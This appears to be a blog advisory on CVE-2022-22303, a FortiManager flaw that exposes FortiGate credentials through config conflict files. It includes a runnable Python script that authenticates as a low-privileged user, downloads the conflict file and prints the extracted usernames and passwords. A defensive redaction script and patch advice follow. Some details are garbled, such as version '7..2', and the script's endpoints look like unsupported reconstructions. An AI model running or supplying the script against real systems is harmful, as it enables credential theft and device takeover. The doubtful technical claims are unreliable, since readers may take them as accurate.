Recently, a critical vulnerability, CVE-2022-22303, was discovered in FortiManager software. It is an exposure of sensitive system information to an unauthorized control sphere, classified as CWE-497. By exploiting this vulnerability, a low-privileged authenticated user can gain access to FortiGate user credentials via the config conflict file. It affects FortiManager versions prior to 7..2, 6.4.7, and 6.2.9. This post aims to provide a comprehensive understanding of this vulnerability, including code snippets, original references, and exploit details, in plain language.

Exploit Details

The vulnerability lies in the configuration comparison functionality in FortiManager, which generates conflict files when there is a mismatch between the configuration stored in FortiManager and the configuration on the managed device. An attacker with low-privileged access can exploit this vulnerability to access and read the config conflict file, which contains sensitive information such as FortiGate user credentials. This exposure of sensitive information can lead to unauthorized access to the FortiGate device.

Code Snippet

The following code snippet shows an example of how an attacker with low privileges could access the FortiGate user credentials by reading the config conflict file:

#!/usr/bin/env python3
import requests

# Replace these with the FortiManager target, username, and password
target = "https://target-fortimanager-ip"
username = "low_priv_user"
password = "low_priv_password"

# Authenticate and get the token
session = requests.Session()
auth_payload = {"user": username, "passwd": password}
auth_response = session.post(f"{target}/jsonrpc", json={"method": "exec", "params": [auth_payload], "id": 1})
token = auth_response.json()["result"]["token"]

# Set the token in the header
session.headers.update({"x-auth-token": token})

# Get the configuration conflict file
conflict_file_response = session.get(f"{target}/config/conflict_file")
conflict_file_content = conflict_file_response.text

# Extract the user credentials from the conflict file
fortigate_user = ""
fortigate_password = ""
for line in conflict_file_content.splitlines():
    if "set username" in line:
        fortigate_user = line.split(" ")[-1]
    if "set password" in line:
        fortigate_password = line.split(" ")[-1]

print(f"Fortigate Username: {fortigate_user}\nFortigate Password: {fortigate_password}")
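The snippet above depends on the conflict file carrying FortiGate credentials in plain `set username` / `set password` lines. The following is an added example (not part of the original post or any Fortinet code) that a defender can run over an exported conflict file or any FortiGate-style CLI config text to find such lines and produce a redacted copy before the file is stored, diffed or shared. The list of secret-bearing keys and the sample config fragment are assumptions made for this example.

```python
#!/usr/bin/env python3
"""Scan FortiGate-style CLI config text (such as a FortiManager conflict file)
for lines that carry credential material, and produce a redacted copy."""
import re

# Config keys whose values are secrets in FortiGate CLI syntax. This list is an
# assumption for this example; extend it to match your own audit policy.
SECRET_KEYS = ("password", "passwd", "psksecret", "secret", "key", "private-key")

# Matches "set <key> <value>" with any indentation; group 1 keeps the prefix so
# a redacted line preserves the original layout.
SET_LINE = re.compile(r"^(\s*set\s+(?P<key>[\w-]+)\s+)(?P<value>.+?)\s*$")


def find_credential_lines(config_text):
    """Return [(line_no, key, value)] for every 'set <secret-key> <value>' line."""
    hits = []
    for line_no, line in enumerate(config_text.splitlines(), start=1):
        m = SET_LINE.match(line)
        if m and m.group("key") in SECRET_KEYS:
            hits.append((line_no, m.group("key"), m.group("value")))
    return hits


def redact(config_text, mask="<REDACTED>"):
    """Return a copy of the text with every secret value replaced by mask."""
    out = []
    for line in config_text.splitlines():
        m = SET_LINE.match(line)
        if m and m.group("key") in SECRET_KEYS:
            out.append(m.group(1) + mask)
        else:
            out.append(line)
    return "\n".join(out)


# Constructed sample in the shape of a FortiGate config fragment (not a real conflict file).
SAMPLE = """\
config system admin
    edit "fgt-admin"
        set username admin
        set password ENC AAA111BBB222
        set accprofile "super_admin"
    next
end
"""

if __name__ == "__main__":
    for line_no, key, value in find_credential_lines(SAMPLE):
        print(f"line {line_no}: secret key '{key}' (value length {len(value)})")
    print(redact(SAMPLE))
```

A non-empty result from `find_credential_lines` on a file that low-privileged users can read is the condition this advisory describes, and is a reason to rotate the exposed credentials as well as to patch.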

Original References

- Fortinet Security Advisory
- CVE-2022-22303 - CISA
- CWE-497: Exposure of Sensitive System Information to an Unauthorized Control Sphere

Conclusion

CVE-2022-22303 is a critical vulnerability that exposes sensitive information in FortiManager software, potentially allowing unauthorized access to the managed FortiGate device. Users and organizations are urged to update their FortiManager installations to the fixed versions (7..2, 6.4.7, and 6.2.9) to mitigate this vulnerability. Implementing proper access controls, monitoring logs, and staying informed about the latest threats are essential steps in maintaining a strong cybersecurity posture.

Timeline

Published on: 03/02/2022 10:15:00 UTC
Last modified on: 03/10/2022 15:21:00 UTC